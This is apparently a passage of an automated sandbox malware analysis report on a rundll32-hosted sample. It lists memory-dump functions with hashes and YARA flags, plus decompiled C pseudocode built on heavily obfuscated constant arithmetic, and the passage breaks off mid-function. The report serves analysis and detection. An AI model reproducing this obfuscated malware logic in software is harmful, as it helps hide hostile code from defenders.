                                                                      • Instruction ID: f6bd434f5c777389d5f28c709cc1c7e4b3743189eb17f216df19865100ad6e26
                                                                      • Opcode Fuzzy Hash: fc2d789eabe48cdc59d171c9d20727d18d47b5be924bcbca87a47b244e86dfb7
                                                                      • Instruction Fuzzy Hash: 7FB12272D01319EBEB28CFE5D8899DEBBB1FF44314F248159E101BA2A0D7B90A46CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023DB86, Relevance: .2, Instructions: 226COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa4949545701073c0452a974a92e1707d2150ce4ae3387db057db6a61aabe181
                                                                      • Instruction ID: 0dd1b5a6a7f7ffd2944eb3f3bdf97bfd0a1ccf7079c36a064748b420bab8be6f
                                                                      • Opcode Fuzzy Hash: aa4949545701073c0452a974a92e1707d2150ce4ae3387db057db6a61aabe181
                                                                      • Instruction Fuzzy Hash: AEB11372D11319EBDB28CFE5D88A5DEBBB1FF44314F248159E101BA2A0D7B80A56CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200CBE7, Relevance: .2, Instructions: 194COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E0200CBE7(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* _t219;
				signed int _t250;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t284;
				void* _t286;

				_push(_a12);
				_t286 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t219);
				_v72 = 0xff63;
				_t254 = 0x3f;
				_v72 = _v72 / _t254;
				_v72 = _v72 ^ 0x0000040c;
				_v44 = 0x91a7;
				_v44 = _v44 + 0x72f0;
				_v44 = _v44 + 0xffff06b2;
				_v44 = _v44 ^ 0x7ebd7edf;
				_v44 = _v44 ^ 0x7ebd7382;
				_v80 = 0x7372;
				_v80 = _v80 + 0x2298;
				_v80 = _v80 ^ 0x00009e0a;
				_v32 = 0xf77b;
				_v32 = _v32 + 0xffff7d6a;
				_v32 = _v32 << 2;
				_v32 = _v32 + 0x362;
				_v32 = _v32 ^ 0x0001db13;
				_v16 = 0x136c;
				_v16 = _v16 + 0x48d8;
				_v16 = _v16 ^ 0xac4e468e;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x002b0548;
				_v40 = 0x3373;
				_v40 = _v40 + 0xffffe1ff;
				_v40 = _v40 + 0xffff2492;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x003fb2a7;
				_v56 = 0x21f6;
				_t255 = 0x1f;
				_v56 = _v56 * 0x2b;
				_v56 = _v56 / _t255;
				_v56 = _v56 ^ 0x00002778;
				_v68 = 0x53f7;
				_v68 = _v68 ^ 0xc2013ade;
				_v68 = _v68 ^ 0xc201165c;
				_v88 = 0x904;
				_v88 = _v88 + 0xffff70ae;
				_v88 = _v88 ^ 0xffff0cbd;
				_v12 = 0x6bbb;
				_t256 = 0x5d;
				_t284 = 0x1e;
				_v12 = _v12 * 0x56;
				_v12 = _v12 + 0x87c0;
				_v12 = _v12 + 0xffff5e93;
				_v12 = _v12 ^ 0x002412a1;
				_v8 = 0x6b19;
				_v8 = _v8 / _t256;
				_v8 = _v8 >> 1;
				_v8 = _v8 / _t284;
				_v8 = _v8 ^ 0x00002578;
				_v24 = 0x1b3a;
				_v24 = _v24 + 0x4480;
				_v24 = _v24 + 0xffff3a7d;
				_v24 = _v24 + 0xffff7f01;
				_v24 = _v24 ^ 0xffff7fa1;
				_v28 = 0x593f;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x30479afe;
				_v28 = _v28 | 0x2165af19;
				_v28 = _v28 ^ 0x3167a871;
				_v76 = 0x861a;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x00001e41;
				_v20 = 0xbc3c;
				_v20 = _v20 + 0xffff2788;
				_v20 = _v20 >> 6;
				_v20 = _v20 + 0xffff65b3;
				_v20 = _v20 ^ 0x03ff130c;
				_v92 = 0x12c7;
				_v92 = _v92 + 0xffff7146;
				_v92 = _v92 ^ 0xffff9baa;
				_v36 = 0xedf2;
				_v36 = _v36 << 3;
				_t257 = 0xc;
				_v36 = _v36 * 0xa;
				_v36 = _v36 ^ 0x56c2f471;
				_v36 = _v36 ^ 0x5688d77c;
				_v64 = 0x6a0;
				_v64 = _v64 * 0x5b;
				_v64 = _v64 ^ 0x0002624d;
				_v84 = 0xe931;
				_v84 = _v84 * 0x43;
				_v84 = _v84 ^ 0x003d25b3;
				_v60 = 0xc012;
				_t258 = 0x27;
				_v60 = _v60 / _t257;
				_v60 = _v60 ^ 0x00000568;
				_v48 = 0xfc11;
				_v48 = _v48 | 0xf924173d;
				_v48 = _v48 / _t258;
				_v48 = _v48 ^ 0x06636dad;
				_v52 = 0xa67a;
				_v52 = _v52 ^ 0x536712b1;
				_v52 = _v52 << 2;
				_v52 = _v52 ^ 0x4d9efdac;
				E01FF5755(_v32,  &_v124, _v16, _v40, _t284);
				E01FF5755(_v56,  &_v644, _v68, _v88, 0x208);
				E01FF5755(_v12,  &_v1164, _v8, _v24, 0x208);
				E020003F1(_v28, _v76, _t286,  &_v644, _v20, _v92);
				E020003F1(_v36, _v64, _a12,  &_v1164, _v84, _v60);
				_v120 = _v72;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v80 | _v44;
				_t250 = E01FFE554(_v48,  &_v124, _v52);
				asm("sbb eax, eax");
				return  ~_t250 + 1;
			}









































                                                                      0x0200cbf2
                                                                      0x0200cbf5
                                                                      0x0200cbf7
                                                                      0x0200cbfa
                                                                      0x0200cbfd
                                                                      0x0200cbfe
                                                                      0x0200cbff
                                                                      0x0200cc04
                                                                      0x0200cc12
                                                                      0x0200cc17
                                                                      0x0200cc1c
                                                                      0x0200cc23
                                                                      0x0200cc2a
                                                                      0x0200cc31
                                                                      0x0200cc38
                                                                      0x0200cc3f
                                                                      0x0200cc46
                                                                      0x0200cc4d
                                                                      0x0200cc54
                                                                      0x0200cc5b
                                                                      0x0200cc62
                                                                      0x0200cc69
                                                                      0x0200cc6d
                                                                      0x0200cc74
                                                                      0x0200cc7b
                                                                      0x0200cc82
                                                                      0x0200cc89
                                                                      0x0200cc90
                                                                      0x0200cc94
                                                                      0x0200cc9b
                                                                      0x0200cca2
                                                                      0x0200cca9
                                                                      0x0200ccb0
                                                                      0x0200ccb4
                                                                      0x0200ccbb
                                                                      0x0200ccc6
                                                                      0x0200ccc9
                                                                      0x0200ccd3
                                                                      0x0200ccd6
                                                                      0x0200ccdd
                                                                      0x0200cce4
                                                                      0x0200cceb
                                                                      0x0200ccf2
                                                                      0x0200ccf9
                                                                      0x0200cd00
                                                                      0x0200cd07
                                                                      0x0200cd12
                                                                      0x0200cd15
                                                                      0x0200cd16
                                                                      0x0200cd19
                                                                      0x0200cd20
                                                                      0x0200cd27
                                                                      0x0200cd2e
                                                                      0x0200cd3c
                                                                      0x0200cd3f
                                                                      0x0200cd47
                                                                      0x0200cd4a
                                                                      0x0200cd51
                                                                      0x0200cd58
                                                                      0x0200cd5f
                                                                      0x0200cd66
                                                                      0x0200cd6d
                                                                      0x0200cd76
                                                                      0x0200cd7d
                                                                      0x0200cd81
                                                                      0x0200cd88
                                                                      0x0200cd8f
                                                                      0x0200cd96
                                                                      0x0200cd9d
                                                                      0x0200cda1
                                                                      0x0200cda8
                                                                      0x0200cdaf
                                                                      0x0200cdb6
                                                                      0x0200cdba
                                                                      0x0200cdc1
                                                                      0x0200cdc8
                                                                      0x0200cdcf
                                                                      0x0200cdd6
                                                                      0x0200cddd
                                                                      0x0200cde4
                                                                      0x0200cdee
                                                                      0x0200cdf1
                                                                      0x0200cdf4
                                                                      0x0200cdfb
                                                                      0x0200ce02
                                                                      0x0200ce0d
                                                                      0x0200ce10
                                                                      0x0200ce17
                                                                      0x0200ce22
                                                                      0x0200ce25
                                                                      0x0200ce2c
                                                                      0x0200ce38
                                                                      0x0200ce39
                                                                      0x0200ce3e
                                                                      0x0200ce45
                                                                      0x0200ce4c
                                                                      0x0200ce59
                                                                      0x0200ce5f
                                                                      0x0200ce66
                                                                      0x0200ce6d
                                                                      0x0200ce74
                                                                      0x0200ce78
                                                                      0x0200ce88
                                                                      0x0200cea2
                                                                      0x0200ceb7
                                                                      0x0200ced0
                                                                      0x0200ceee
                                                                      0x0200cef9
                                                                      0x0200cf02
                                                                      0x0200cf0b
                                                                      0x0200cf1a
                                                                      0x0200cf1e
                                                                      0x0200cf28
                                                                      0x0200cf30

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba3467f06acdf9d06503376040d4ce359b65c62597fe6af5f322f40bb5cf6547
                                                                      • Instruction ID: 558b53cffcd6585f78894ce6a93b5aac1a018fe7f594b39c264beabe29fdd0cc
                                                                      • Opcode Fuzzy Hash: ba3467f06acdf9d06503376040d4ce359b65c62597fe6af5f322f40bb5cf6547
                                                                      • Instruction Fuzzy Hash: 02A1FEB5D0121DEBEF58CFA5D9898DEFBB2FF44314F208159D411BA2A0D7B81A468F44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024C15B, Relevance: .2, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08ea68c10d15278ac49c801fb238b372f48627dc15057eefc62ed6f36c75a0e2
                                                                      • Instruction ID: 98b1939f8675a063755e58310558690aae83cf9ec8086923f9199cbb3755d259
                                                                      • Opcode Fuzzy Hash: 08ea68c10d15278ac49c801fb238b372f48627dc15057eefc62ed6f36c75a0e2
                                                                      • Instruction Fuzzy Hash: 16A1EEB1D01219EBEF58CFE5D98A8DEFBB1BF44314F208159E411BA2A0D7B91A46CF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023598B, Relevance: .2, Instructions: 181COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74bbbfef80275cc225fbb300c148a6558012b133be6a1c7b0e45d04742c38daa
                                                                      • Instruction ID: e0c2c90ac34a8c29980af32feda4b3655160fd57916cf14cbe5ab68f15fcdce9
                                                                      • Opcode Fuzzy Hash: 74bbbfef80275cc225fbb300c148a6558012b133be6a1c7b0e45d04742c38daa
                                                                      • Instruction Fuzzy Hash: 0391F2B1410649EBDF59CF64C9498CE3FA1FF44358F509218FE2A961A0D3B6C9A9CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020187D0, Relevance: .2, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae4fbf83f7fa240191960083aa504b2a4abfc05d32cdfb9d3caf8e6517ac7c3b
                                                                      • Instruction ID: 993398c6bcdeb61c594f466b75e9d5b5d3360fd30c5917456b30435d47d7c15b
                                                                      • Opcode Fuzzy Hash: ae4fbf83f7fa240191960083aa504b2a4abfc05d32cdfb9d3caf8e6517ac7c3b
                                                                      • Instruction Fuzzy Hash: 6F41037145A3C1DFD3430F7488652A27FB1EF17229B6904EFC9808F127E2691847DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02002FA1, Relevance: .1, Instructions: 138COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E02002FA1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v152;
				void* _t110;
				void* _t117;
				intOrPtr _t123;
				intOrPtr _t125;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr _t160;
				void* _t161;
				void* _t163;
				void* _t164;

				_t164 = __eflags;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t110);
				_v88 = 0x5fdafb;
				_t150 =  &_v152;
				_v84 = 0x272783;
				_t160 = 0;
				_v80 = 0xd89dc;
				_v76 = 0;
				_v48 = 0x58f7;
				_v48 = _v48 + 0xcffd;
				_v48 = _v48 ^ 0x00015f94;
				_v12 = 0xd46e;
				_v12 = _v12 | 0xfa6bedce;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0fa6c3f2;
				_v16 = 0x3620;
				_v16 = _v16 | 0xaf83d9cf;
				_v16 = _v16 ^ 0x6ff25359;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x180e6d86;
				_v44 = 0x33ae;
				_v44 = _v44 + 0xffff05b5;
				_v44 = _v44 ^ 0xffff5bf3;
				_v24 = 0x830a;
				_v24 = _v24 | 0xa02b6576;
				_v24 = _v24 + 0xffff5bd8;
				_v24 = _v24 ^ 0xa02b6dd8;
				_v28 = 0xcb19;
				_v28 = _v28 << 7;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x00cb50e4;
				_v36 = 0x6363;
				_v36 = _v36 | 0xa74857af;
				_v36 = _v36 ^ 0x416ac2c3;
				_v36 = _v36 ^ 0xe622f2da;
				_v32 = 0xc5a6;
				_v32 = _v32 ^ 0x561a69db;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x0d563ace;
				_v40 = 0x6155;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 * 0x3b;
				_v40 = _v40 ^ 0x00001994;
				_v20 = 0xb711;
				_v20 = _v20 >> 7;
				_v20 = _v20 * 0x78;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x00000d9d;
				E01FFFEE3(_a4,  &_v152, _v48, _v12, _v16, _v44);
				_t117 = E01FFF914(_v24, _v28, _t164, _v36,  &_v72, _v32, _t150);
				_t163 = _t161 + 0x2c;
				while(_t117 != 0) {
					__eflags = E01FFBE74(_v40,  &_v64, _v20,  &_v72);
					if(__eflags != 0) {
						_t123 = _v60 - 1;
						__eflags = _t123;
						if(_t123 == 0) {
							E02003F4F(_v64,  &_v56);
						} else {
							_t125 = _t123 - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								E01FF240F(_v64,  &_v56);
							} else {
								_t127 = _t125 - 1;
								__eflags = _t127;
								if(_t127 == 0) {
									E0200D70B(_v64,  &_v56);
								} else {
									_t129 = _t127 - 1;
									__eflags = _t129;
									if(_t129 == 0) {
										E01FFADAF(_v64,  &_v56);
									} else {
										_t131 = _t129 - 6;
										__eflags = _t131;
										if(_t131 == 0) {
											E0200BBF1(_v64,  &_v56);
										} else {
											__eflags = _t131 == 1;
											if(_t131 == 1) {
												E02006BE4(_v64,  &_v56);
											}
										}
									}
								}
							}
						}
						_t160 = _t160 + 1;
						__eflags = _t160;
					}
					_t117 = E01FFF914(_v24, _v28, __eflags, _v36,  &_v72, _v32,  &_v152);
					_t163 = _t163 + 0x10;
				}
				return _t160;
			}

































                                                                      0x02002fa1
                                                                      0x02002fab
                                                                      0x02002fae
                                                                      0x02002faf
                                                                      0x02002fb0
                                                                      0x02002fb5
                                                                      0x02002fbc
                                                                      0x02002fc2
                                                                      0x02002fc9
                                                                      0x02002fcb
                                                                      0x02002fd5
                                                                      0x02002fd8
                                                                      0x02002fdf
                                                                      0x02002fe6
                                                                      0x02002fed
                                                                      0x02002ff4
                                                                      0x02002ffb
                                                                      0x02002fff
                                                                      0x02003006
                                                                      0x0200300d
                                                                      0x02003014
                                                                      0x0200301b
                                                                      0x0200301f
                                                                      0x02003026
                                                                      0x0200302d
                                                                      0x02003034
                                                                      0x0200303b
                                                                      0x02003042
                                                                      0x02003049
                                                                      0x02003050
                                                                      0x02003057
                                                                      0x0200305e
                                                                      0x02003062
                                                                      0x02003065
                                                                      0x0200306c
                                                                      0x02003073
                                                                      0x0200307a
                                                                      0x02003081
                                                                      0x02003088
                                                                      0x0200308f
                                                                      0x02003096
                                                                      0x0200309a
                                                                      0x020030a1
                                                                      0x020030a8
                                                                      0x020030b3
                                                                      0x020030b6
                                                                      0x020030bd
                                                                      0x020030c4
                                                                      0x020030cc
                                                                      0x020030cf
                                                                      0x020030d3
                                                                      0x020030e6
                                                                      0x020030fe
                                                                      0x02003103
                                                                      0x020031a6
                                                                      0x0200311f
                                                                      0x02003121
                                                                      0x02003126
                                                                      0x02003126
                                                                      0x02003127
                                                                      0x02003181
                                                                      0x02003129
                                                                      0x02003129
                                                                      0x02003129
                                                                      0x0200312a
                                                                      0x02003174
                                                                      0x0200312c
                                                                      0x0200312c
                                                                      0x0200312c
                                                                      0x0200312d
                                                                      0x02003167
                                                                      0x0200312f
                                                                      0x0200312f
                                                                      0x0200312f
                                                                      0x02003130
                                                                      0x0200315a
                                                                      0x02003132
                                                                      0x02003132
                                                                      0x02003132
                                                                      0x02003135
                                                                      0x0200314d
                                                                      0x02003137
                                                                      0x02003137
                                                                      0x02003138
                                                                      0x02003140
                                                                      0x02003140
                                                                      0x02003138
                                                                      0x02003135
                                                                      0x02003130
                                                                      0x0200312d
                                                                      0x0200312a
                                                                      0x02003186
                                                                      0x02003186
                                                                      0x02003186
                                                                      0x0200319e
                                                                      0x020031a3
                                                                      0x020031a3
                                                                      0x020031b4

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 798dcc80f28f754ef4a8133266f197d27c7fe18b7239adb6d2b86fb99832f5cb
                                                                      • Instruction ID: b8cdbc0c3a6d51ab4d858ecf84520102bdfe34f71d26559464b990975b993f10
                                                                      • Opcode Fuzzy Hash: 798dcc80f28f754ef4a8133266f197d27c7fe18b7239adb6d2b86fb99832f5cb
                                                                      • Instruction Fuzzy Hash: 0251F371C0431EABEF09DFA4D9858EEBBB6FF48304F208158D511B62A4DBB55A05CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00242515, Relevance: .1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7070687d6ceda5e5642993e06f2153beae939ad7cb8a2d3d8133440fa5b476b5
                                                                      • Instruction ID: 2c536a0daeb778243eac57dfe0014ed73accfa0e1f2af864d89c58e20918a044
                                                                      • Opcode Fuzzy Hash: 7070687d6ceda5e5642993e06f2153beae939ad7cb8a2d3d8133440fa5b476b5
                                                                      • Instruction Fuzzy Hash: 0C511371C1021EEBDF09DFA5D9468EEBBBAFF44304F608118E412B6264D7B45A29CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFA525, Relevance: .1, Instructions: 114COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 87%
                                                                      			E01FFA525(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t124;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				void* _t148;

				_push(_a12);
				_push(_a8);
				_v48 = 0x104;
				_push(_a4);
				_push(__edx);
				_push(0x104);
				E02002550(0x104);
				_v8 = 0x5228;
				_t148 = 0;
				_t129 = 0x75;
				_v8 = _v8 / _t129;
				_t130 = 0x18;
				_v8 = _v8 / _t130;
				_v8 = _v8 + 0x75ec;
				_v8 = _v8 ^ 0x00006735;
				_v24 = 0x3444;
				_v24 = _v24 | 0x67f8f53e;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x00009a34;
				_v16 = 0xef12;
				_v16 = _v16 >> 7;
				_t131 = 0x4c;
				_v16 = _v16 * 0x61;
				_v16 = _v16 + 0x9bb9;
				_v16 = _v16 ^ 0x00012294;
				_v44 = 0xb0ea;
				_v44 = _v44 + 0xffff7f2b;
				_v44 = _v44 ^ 0x00003439;
				_v28 = 0xbc68;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0b04eabb;
				_v28 = _v28 ^ 0x0b06595b;
				_v40 = 0x8c64;
				_v40 = _v40 * 5;
				_v40 = _v40 + 0x4c62;
				_v40 = _v40 ^ 0x00036b68;
				_v36 = 0xe385;
				_v36 = _v36 << 7;
				_t132 = 5;
				_v36 = _v36 / _t131;
				_v36 = _v36 ^ 0x000154a9;
				_v20 = 0xd5bf;
				_v20 = _v20 + 0x3bce;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 | 0xfc33a738;
				_v20 = _v20 ^ 0xfc33f58d;
				_v32 = 0xac74;
				_v32 = _v32 << 0xf;
				_v32 = _v32 / _t132;
				_v32 = _v32 ^ 0x113ecb06;
				_v12 = 0x99c5;
				_v12 = _v12 << 0xa;
				_v12 = _v12 >> 7;
				_v12 = _v12 | 0x7a8586f5;
				_v12 = _v12 ^ 0x7a85defd;
				_t124 = E02003358(_t132, _v12, _t132, _t132, _a8);
				_t147 = _t124;
				if(_t124 != 0) {
					_push(_t132);
					_t148 = E02001B9D(_v16, _v44, _a4, _v28, _t147,  &_v48);
					E01FFF1ED(_v40, _v36, _v20, _v32, _t147);
				}
				return _t148;
			}




















                                                                      0x01ffa52d
                                                                      0x01ffa535
                                                                      0x01ffa538
                                                                      0x01ffa53b
                                                                      0x01ffa53e
                                                                      0x01ffa53f
                                                                      0x01ffa540
                                                                      0x01ffa545
                                                                      0x01ffa554
                                                                      0x01ffa558
                                                                      0x01ffa55d
                                                                      0x01ffa565
                                                                      0x01ffa56a
                                                                      0x01ffa56f
                                                                      0x01ffa576
                                                                      0x01ffa57d
                                                                      0x01ffa584
                                                                      0x01ffa58b
                                                                      0x01ffa58f
                                                                      0x01ffa596
                                                                      0x01ffa59d
                                                                      0x01ffa5a5
                                                                      0x01ffa5a8
                                                                      0x01ffa5ab
                                                                      0x01ffa5b2
                                                                      0x01ffa5b9
                                                                      0x01ffa5c0
                                                                      0x01ffa5c7
                                                                      0x01ffa5ce
                                                                      0x01ffa5d5
                                                                      0x01ffa5d9
                                                                      0x01ffa5e0
                                                                      0x01ffa5e7
                                                                      0x01ffa5f2
                                                                      0x01ffa5f5
                                                                      0x01ffa5fc
                                                                      0x01ffa603
                                                                      0x01ffa60a
                                                                      0x01ffa613
                                                                      0x01ffa614
                                                                      0x01ffa619
                                                                      0x01ffa620
                                                                      0x01ffa627
                                                                      0x01ffa62e
                                                                      0x01ffa632
                                                                      0x01ffa639
                                                                      0x01ffa640
                                                                      0x01ffa647
                                                                      0x01ffa653
                                                                      0x01ffa656
                                                                      0x01ffa65d
                                                                      0x01ffa664
                                                                      0x01ffa668
                                                                      0x01ffa66c
                                                                      0x01ffa673
                                                                      0x01ffa685
                                                                      0x01ffa68a
                                                                      0x01ffa691
                                                                      0x01ffa693
                                                                      0x01ffa6ae
                                                                      0x01ffa6b9
                                                                      0x01ffa6be
                                                                      0x01ffa6c8

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2bbadcc866d8b4040baa0a8c8f4469103875442558c010708b315e9b0989b624
                                                                      • Instruction ID: 09e02359150feb6c844553e65da193b17205c0893fb23062b5c0839ebdcaac6a
                                                                      • Opcode Fuzzy Hash: 2bbadcc866d8b4040baa0a8c8f4469103875442558c010708b315e9b0989b624
                                                                      • Instruction Fuzzy Hash: 6A5115B1D0020DEBEF09CFE5C84A8DEBBB6EB48318F208159D514B6290D7B95B45DFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00239A99, Relevance: .1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 131e7aa17b19979d871cdb98180a0e79ec1912da9ff08fe787abe98a1c671a6b
                                                                      • Instruction ID: 0f571226c79ac72be3702b5d1e7757603c656335b23ca7baae7702d051244f61
                                                                      • Opcode Fuzzy Hash: 131e7aa17b19979d871cdb98180a0e79ec1912da9ff08fe787abe98a1c671a6b
                                                                      • Instruction Fuzzy Hash: CE5117B1D00209EBDF09CFE1C94A8DEBBB5EB48314F208159E414B6290D7B95B55CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFA6C9, Relevance: .1, Instructions: 90COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E01FFA6C9(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v560;
				intOrPtr* _t92;

				_v40 = 0;
				_v8 = 0xf494;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0xf278016b;
				_v8 = _v8 ^ 0xf2787422;
				_v24 = 0xcf3b;
				_v24 = _v24 + 0xffff718a;
				_push(0x48);
				_pop(0);
				_v24 = _v24 / 0;
				_v24 = _v24 ^ 0x00007af7;
				_v32 = 0xe834;
				_v32 = _v32 + 0x185d;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x000037bf;
				_v20 = 0xef96;
				_v20 = _v20 + 0xffffdb9a;
				_v20 = _v20 * 0x73;
				_v20 = _v20 ^ 0x005b1c49;
				_v36 = 0x968d;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x000009ee;
				_v28 = 0x17aa;
				_v28 = _v28 / 0;
				_v28 = _v28 * 0x3a;
				_v28 = _v28 ^ 0x00000fdd;
				_v12 = 0xb689;
